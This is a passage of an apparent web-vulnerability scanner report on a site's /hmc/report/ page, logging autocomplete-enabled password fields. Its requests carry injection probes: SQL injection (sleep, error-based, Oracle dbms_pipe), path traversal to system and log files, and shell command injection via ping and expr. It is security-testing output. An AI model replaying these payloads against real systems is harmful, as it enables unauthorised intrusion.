Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.43. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111'))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.44. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/fd/2%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.45. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+OR+17-7%3d10

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-1+OR+17-7%3d10 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+OR+17-7%3d10" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.46. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:05 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.47. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.48. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.49. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.50. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.51. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../etc/httpd/logs/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../etc/httpd/logs/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.52. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.53. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://www.netsparker.com?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=http://www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.54. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.55. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2527

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.56. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=*/netsparker(0x000052)%3B/*

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=*/netsparker(0x000052)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:52 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:52 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000052)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.57. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.58. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?'

The form contains the following password field with autocomplete enabled:

j_password

Request

Response

17.59. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%26ping%20-c%2026%20127.0.0.1%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
